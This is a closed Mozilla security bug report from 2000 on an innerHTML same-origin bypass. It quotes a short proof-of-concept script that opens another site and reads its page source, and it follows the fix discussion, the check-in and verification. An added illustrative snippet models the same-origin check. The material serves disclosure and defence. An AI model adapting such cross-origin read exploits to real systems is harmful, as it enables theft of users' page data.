Closed Bug 39083 Opened 24 years ago Closed 24 years ago

innerHTML vulnerability

Categories: Core :: Security, defect, P3
Tracking: VERIFIED FIXED
People: Reporter: security-bugs, Assigned: security-bugs
Details: Whiteboard: [nsbeta2+]

Date: Fri, 12 May 2000 15:35:59 +0300
From: Georgi Guninski <joro@nat.bg>
To: Mitchell Stoltz <mstoltz@netscape.com>

The innerHTML property is not protected by Same Origin security policy. This allows reading arbitrary documents that have images (probably all others also).

The code is:
--------------------------------------------------
<SCRIPT>
a=window.open("http://www.yahoo.com");
function f()
{
  alert("Here is the source of Yahoo: "+a.document.images[0].offsetParent.innerHTML);
}
setTimeout("f()",5000);
</SCRIPT>
--------------------------------------------------
Marking nsbeta2. Created testcase, in URL field above. Need to add security check. I'd like to consider Georgi's suggestion that we set access to ALL DOM properties to same-origin by default. This will save us having to inspect each one of these properties for vulnerabilities such as this one. Is this feasible? Will it break things? I think this is the policy IE uses. CCing DOM folks.
Status: NEW → ASSIGNED
Keywords: nsbeta2
Target Milestone: --- → M17
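The check proposed above, as an added illustration (not Mozilla's fix and not the code in all.js): a default-deny same-origin comparison applied to a cross-window innerHTML read like the one in the report. The window objects, the `readInnerHTML` accessor and the site names other than www.yahoo.com are assumptions for the demo; Node's built-in URL class does the parsing.

```javascript
// Same origin = same scheme, same host, same port. WHATWG URL drops a
// scheme-default port (so ":80" on http compares equal to no port) and
// lower-cases the host, so a field-by-field compare is enough here.
function sameOrigin(hrefA, hrefB) {
  const a = new URL(hrefA);
  const b = new URL(hrefB);
  return a.protocol === b.protocol &&
         a.hostname === b.hostname &&
         a.port === b.port;
}

// Stand-in for a browser window: its location plus the document it holds
// (assumed structure, for illustration only).
function makeWindow(href, html) {
  return { location: href, document: { innerHTML: html } };
}

// Every cross-window DOM property read goes through this gate; access is
// refused unless the reading window's origin matches the target's.
function readInnerHTML(subjectWindow, objectWindow) {
  if (!sameOrigin(subjectWindow.location, objectWindow.location)) {
    const from = new URL(subjectWindow.location).origin;
    throw new Error(`Permission denied to access property "innerHTML" from ${from}`);
  }
  return objectWindow.document.innerHTML;
}

// Constructed scenario mirroring the report: a page on one host opens
// another site and tries to read its markup; a second window on the
// opener's own origin is readable.
const openerPage = makeWindow('http://site-a.example/', '<p>opener</p>');
const otherSite  = makeWindow('http://www.yahoo.com/', '<img src="logo.gif">');
const sameSite   = makeWindow('http://site-a.example:80/other', '<p>same origin</p>');

function demo() {
  const results = {};
  try {
    results.crossOrigin = readInnerHTML(openerPage, otherSite);
  } catch (e) {
    results.crossOrigin = e.message;   // denied: different host
  }
  results.sameOrigin = readInnerHTML(openerPage, sameSite);  // allowed
  return results;
}

console.log(demo());
```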
What prevents the page from simply doing a.document.innerHTML? Should it even be able to get as far as a.document.images[0]? (I agree that restricting access is a good default)
Putting on [nsbeta2+] radar for beta2 fix.
Whiteboard: [nsbeta2+]
Fix checked in. Added security check for this property to all.js.
Status: ASSIGNED → RESOLVED
Closed: 24 years ago
Resolution: --- → FIXED
Verified per mstoltz' comments.
Status: RESOLVED → VERIFIED
Target Milestone: M17 → M16